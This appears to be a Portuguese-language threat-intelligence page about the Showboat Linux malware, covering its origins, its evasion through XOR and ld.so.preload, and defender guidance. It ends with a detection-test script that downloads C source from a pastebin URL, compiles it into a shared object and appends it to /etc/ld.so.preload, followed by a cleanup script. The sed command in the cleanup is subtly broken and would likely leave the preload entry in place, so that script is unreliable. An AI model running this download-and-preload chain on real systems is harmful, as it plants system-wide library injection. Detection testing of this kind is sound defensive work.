SOC Prime Bias: Alto

19 Jun 2026 07:48 UTC

Malware Showboat Alvo de Empresas de Telecomunicações do Oriente Médio Desde 2022

Author Photo
SOC Prime Team linkedin icon Seguir
Malware Showboat Alvo de Empresas de Telecomunicações do Oriente Médio Desde 2022
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Showboat é uma estrutura modular de pós-exploração para Linux construída para ambientes AMD x86-64. Ativo desde meados de 2022, ele é projetado para manter um acesso silencioso e de longo prazo em redes comprometidas. O malware usa métodos avançados de evasão, incluindo criptografia XOR e abuso do linker dinâmico para ocultar processos maliciosos.

Investigação

A investigação rastreou a infraestrutura de comando e controle até Chengdu, China, que, juntamente com as táticas, técnicas e procedimentos observados, sugere vínculos com agentes de ameaça alinhados à República Popular da China. A análise técnica mostrou que o malware depende de uma chave XOR hardcoded para descriptografar sua configuração e abusa ld.so.preload para alcançar furtividade em sistemas infectados.

Mitigação

Os defensores devem observar alterações não autorizadas em /etc/ld.so.preload e uso suspeito do gcc compilador em hosts Linux de produção. Também é recomendada a implantação de monitoramento de rede capaz de identificar comportamento de beaconing, mesmo quando o tempo é randomizado, e usar monitoramento de integridade para bibliotecas de sistema críticas.

Resposta

Se a atividade do Showboat for detectada, isole imediatamente os sistemas Linux afetados da rede para interromper o tráfego de comando e controle adicional. Realize forense de memória para identificar objetos compartilhados injetados e execute uma auditoria completa das configurações do sistema e tarefas agendadas para confirmar que todos os mecanismos de persistência foram removidos.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O Check de Pré-voo de Telemetria & Baseline deve ter sido aprovado.

Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.

  • Narrativa & Comandos do Ataque: O atacante visa estabelecer interceptação persistente de chamadas de sistema. Eles começam baixando um arquivo de origem C malicioso de um URL raw do Pastebin usando curl. Uma vez baixado, eles usam gcc com as flags -shared and -fPIC para compilar a origem em um arquivo de objeto compartilhado chamado malicious.so. Finalmente, eles tentam alcançar persistência ao adicionar o caminho desta biblioteca /etc/ld.so.preload. Esta sequência é projetada para injetar a biblioteca maliciosa em todos os processos do sistema.

  • Script de Teste de Regressão:

    #!/bin/bash
    # Simulação de TTPs do Malware Showboat
    
    # 1. Simular obtenção de fonte C do Pastebin
    # Nota: Usando um link pastebin raw real (simulado para lógica) ou simulando a string
    echo "Criando simulação de download de pastebin simulado..."
    echo 'void __attribute__((constructor)) init() {}' > fake_malware.c
    
    # Este comando aciona a parte 'selection_fetch' da regra
    curl -s https://pastebin.com/raw/example_id -o fake_malware.c
    
    # 2. Simular compilação de um objeto compartilhado
    # Este comando aciona a parte 'selection_compile' da regra
    # (selection_fetch AND selection_compile)
    gcc -shared -fPIC -o /tmp/malicious.so fake_malware.c
    
    # 3. Simular modificação de ld.so.preload
    # Este comando aciona a parte 'selection_preload' da regra
    echo "/tmp/malicious.so" | sudo tee -a /etc/ld.so.preload
    
    echo "Simulação completa. Verifique o SIEM para alertas."
  • Comandos de Limpeza:

    #!/bin/bash
    # Limpeza de artefatos de simulação
    
    # Remover a biblioteca e fonte maliciosas
    sudo rm -f /tmp/malicious.so
    rm -f fake_malware.c
    
    # Remover a entrada de ld.so.preload (Requer cautela)
    # Este comando sed remove a linha contendo /tmp/malicious.so
    sudo sed -i '//tmp/malicious.so/d' /etc/ld.so.preload
    
    echo "Limpeza completa."